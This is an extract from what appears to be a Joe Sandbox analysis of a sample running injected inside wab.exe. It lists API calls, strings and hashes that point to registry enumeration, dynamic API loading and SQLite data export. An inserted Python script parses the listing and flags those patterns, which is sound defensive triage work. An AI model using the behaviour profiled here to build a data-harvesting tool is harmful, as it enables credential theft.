                                                                                              • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                                                              • SetFocus.USER32(?), ref: 00405B76
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$FocusItemmemset
                                                                                              • String ID:
                                                                                              • API String ID: 4281309102-0
                                                                                              • Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                                              • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                                                              • Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                                              • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: _snwprintfwcscat
                                                                                              • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                              • API String ID: 384018552-4153097237
                                                                                              • Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                                              • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                                                              • Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                                              • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                              • String ID: 0$6
                                                                                              • API String ID: 2029023288-3849865405
                                                                                              • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                              • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                                                              • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                              • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                                              • memset.MSVCRT ref: 00405455
                                                                                              • memset.MSVCRT ref: 0040546C
                                                                                              • memset.MSVCRT ref: 00405483
                                                                                              • memcpy.MSVCRT ref: 00405498
                                                                                              • memcpy.MSVCRT ref: 004054AD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$memcpy$ErrorLast
                                                                                              • String ID: 6$\
                                                                                              • API String ID: 404372293-1284684873
                                                                                              • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                              • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                                              • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                              • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                              • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                              • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                              • wcscpy.MSVCRT ref: 0040A0D9
                                                                                              • wcscat.MSVCRT ref: 0040A0E6
                                                                                              • wcscat.MSVCRT ref: 0040A0F5
                                                                                              • wcscpy.MSVCRT ref: 0040A107
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                              • String ID:
                                                                                              • API String ID: 1331804452-0
                                                                                              • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                              • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                                              • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                              • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                              • String ID: advapi32.dll
                                                                                              • API String ID: 2012295524-4050573280
                                                                                              • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                                              • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                                                              • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                                              • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                              • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                              • <%s>, xrefs: 004100A6
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$_snwprintf
                                                                                              • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                              • API String ID: 3473751417-2880344631
                                                                                              • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                              • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                                              • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                              • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: wcscat$_snwprintfmemset
                                                                                              • String ID: %2.2X
                                                                                              • API String ID: 2521778956-791839006
                                                                                              • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                              • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                                              • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                              • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: _snwprintfwcscpy
                                                                                              • String ID: dialog_%d$general$menu_%d$strings
                                                                                              • API String ID: 999028693-502967061
                                                                                              • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                              • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                                              • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                              • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpy$memsetstrlen
                                                                                              • String ID:
                                                                                              • API String ID: 2350177629-0
                                                                                              • Opcode ID: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                                                              • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                                                                              • Opcode Fuzzy Hash: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                                                              • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset
                                                                                              • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                              • API String ID: 2221118986-1606337402
                                                                                              • Opcode ID: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                                                              • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                                                                              • Opcode Fuzzy Hash: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                                                              • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                                                              • String ID:
                                                                                              • API String ID: 265355444-0
                                                                                              • Opcode ID: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                                                              • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                                                                              • Opcode Fuzzy Hash: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                                                              • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                                                                                • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                                                                                • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                • Part of subcall function 0040A9CE: ??3@YAXPAX@Z.MSVCRT ref: 0040A9DD
                                                                                              • memset.MSVCRT ref: 0040C439
                                                                                              • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                              • _wcsupr.MSVCRT ref: 0040C481
                                                                                                • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                                                • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                                                • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                                                              • memset.MSVCRT ref: 0040C4D0
                                                                                              • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??3@$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                                                              • String ID:
                                                                                              • API String ID: 1973883786-0
                                                                                              • Opcode ID: 43de9e52db830488c7ebdb2928a6c49d702693ce72869a855233a6d80c0cc9be
                                                                                              • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                                              • Opcode Fuzzy Hash: 43de9e52db830488c7ebdb2928a6c49d702693ce72869a855233a6d80c0cc9be
                                                                                              • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%
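The two entries above (the advapi32.dll resolver that walks GetSystemDirectoryW and LoadLibraryW and then a run of GetProcAddress calls, and the Shell Folders RegOpenKeyExW/RegEnumValueW loop) are the kind of API pattern an analyst normally picks out of this listing by eye. The Python below is an added example, not part of the Joe Sandbox report or its IDA plugin: it parses function entries written in this listing's layout into records and applies two heuristic rules to them. The rule names and thresholds (at least one LoadLibrary* plus two or more GetProcAddress calls in one function; a RegOpenKey* argument containing "Shell Folders" together with RegEnumValueW) are assumptions chosen for the example, and SAMPLE is constructed from the two entries shown above, trimmed to the fields the parser reads.

```python
import re
from collections import Counter
from dataclasses import dataclass, field

# Constructed sample (an assumption for this example): two function entries in the
# layout of the Joe Sandbox function listing, trimmed to the fields parsed below.
SAMPLE = r"""APIs
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
• GetProcAddress.KERNEL32(?,00000000), ref: 00404398
• GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
• GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
Strings
Similarity
• API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
• String ID: advapi32.dll
• Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
Uniqueness Score: -1.00%
APIs
  • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
• memset.MSVCRT ref: 0040C439
• RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?), ref: 0040C467
• ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
• RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
Similarity
• API ID: ??3@$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
• String ID:
• Opcode ID: 43de9e52db830488c7ebdb2928a6c49d702693ce72869a855233a6d80c0cc9be
Uniqueness Score: -1.00%
"""

# One API line: optional "Part of subcall function XXXXXXXX: " prefix, then
# name.MODULE, optional (args), then "ref: XXXXXXXX". Names may contain "?" and "@"
# (MSVC-decorated operators such as ??3@YAXPAX@Z).
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<caller>[0-9A-F]{8}): )?"
    r"(?P<name>[\w?@]+)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-F]{8})$"
)
SECTION_HEADINGS = {"Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity", "Uniqueness"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: str
    caller: str = ""  # set when the line is a "Part of subcall function" entry


@dataclass
class FunctionEntry:
    calls: list = field(default_factory=list)
    strings: list = field(default_factory=list)
    api_id: str = ""
    opcode_id: str = ""

    def api_counts(self):
        return Counter(c.name for c in self.calls)


def parse_entries(text):
    """Split the listing into FunctionEntry records; an entry runs from "APIs" to "Uniqueness Score"."""
    entries, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip().lstrip("• ").strip()
        if not line:
            continue
        if line == "APIs":
            cur, section = FunctionEntry(), "APIs"
            entries.append(cur)
        elif cur is None:
            continue
        elif line in SECTION_HEADINGS:
            section = line
        elif line.startswith("Uniqueness Score:"):
            cur, section = None, None
        elif line.startswith("API ID:"):
            cur.api_id = line.split(":", 1)[1].strip()
        elif line.startswith("String ID:"):
            # The report joins strings with "$"; a string containing a literal "$" would split wrongly.
            cur.strings += [s for s in line.split(":", 1)[1].strip().split("$") if s]
        elif line.startswith("Opcode ID:"):
            cur.opcode_id = line.split(":", 1)[1].strip()
        elif section == "APIs":
            m = API_RE.match(line)
            if m:
                args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
                cur.calls.append(ApiCall(m["name"], m["module"], args, m["ref"], m["caller"] or ""))
    return entries


def dynamic_api_resolution(entry):
    """LoadLibrary* plus repeated GetProcAddress in one function: imports resolved at run time."""
    counts = entry.api_counts()
    loads = sum(n for name, n in counts.items() if name.startswith("LoadLibrary"))
    return loads >= 1 and counts["GetProcAddress"] >= 2


def shell_folders_enumeration(entry):
    """RegOpenKey* on the Shell Folders key followed by RegEnumValueW: profile paths walked."""
    opens = any(c.name.startswith("RegOpenKey") and any("Shell Folders" in a for a in c.args)
                for c in entry.calls)
    return opens and entry.api_counts()["RegEnumValueW"] >= 1


RULES = {  # hypothetical rule set for the example
    "dynamic_api_resolution": dynamic_api_resolution,
    "shell_folders_enumeration": shell_folders_enumeration,
}


def triage(text):
    """Return (first 12 hex chars of Opcode ID, matched rule names) for every entry in the listing."""
    return [(e.opcode_id[:12], [name for name, rule in RULES.items() if rule(e)])
            for e in parse_entries(text)]


if __name__ == "__main__":
    for opcode_id, hits in triage(SAMPLE):
        print(opcode_id, ", ".join(hits) or "-")
```

Only the "APIs" section and the String ID line are read; the per-string "xrefs:" lines under "Strings" and the fuzzy hashes are skipped, though the Instruction Fuzzy Hash is the field to keep if the same records are to be matched across reports of other samples. Subcall lines are folded into the calling function's record on purpose: the listing attributes LoadLibraryW to 0040A804, but it is the caller at 0040439x that turns the handle into a set of resolved pointers, which is where the behaviour is visible.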

                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 004116FF
                                                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                                                                • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                                                                                • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                                                                                • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                              • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                              • API String ID: 2618321458-3614832568
                                                                                              • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                              • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                                              • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                              • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 004185FC
                                                                                              • GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 0041860A
                                                                                              • ??3@YAXPAX@Z.MSVCRT ref: 00418650
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??3@AttributesFilememset
                                                                                              • String ID:
                                                                                              • API String ID: 776155459-0
                                                                                              • Opcode ID: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                                              • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                                              • Opcode Fuzzy Hash: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                                              • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                                              • malloc.MSVCRT ref: 00417524
                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                                              • ??3@YAXPAX@Z.MSVCRT ref: 00417544
                                                                                              • ??3@YAXPAX@Z.MSVCRT ref: 00417562
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??3@ByteCharMultiWide$ApisFilemalloc
                                                                                              • String ID:
                                                                                              • API String ID: 2308052813-0
                                                                                              • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                                              • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                                              • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                                              • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                                                              • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0041822B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: PathTemp$??3@
                                                                                              • String ID: %s\etilqs_$etilqs_
                                                                                              • API String ID: 1589464350-1420421710
                                                                                              • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                              • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                                              • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                              • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040FDD5
                                                                                                • Part of subcall function 00414E7F: memcpy.MSVCRT ref: 00414EFC
                                                                                                • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                              • _snwprintf.MSVCRT ref: 0040FE1F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
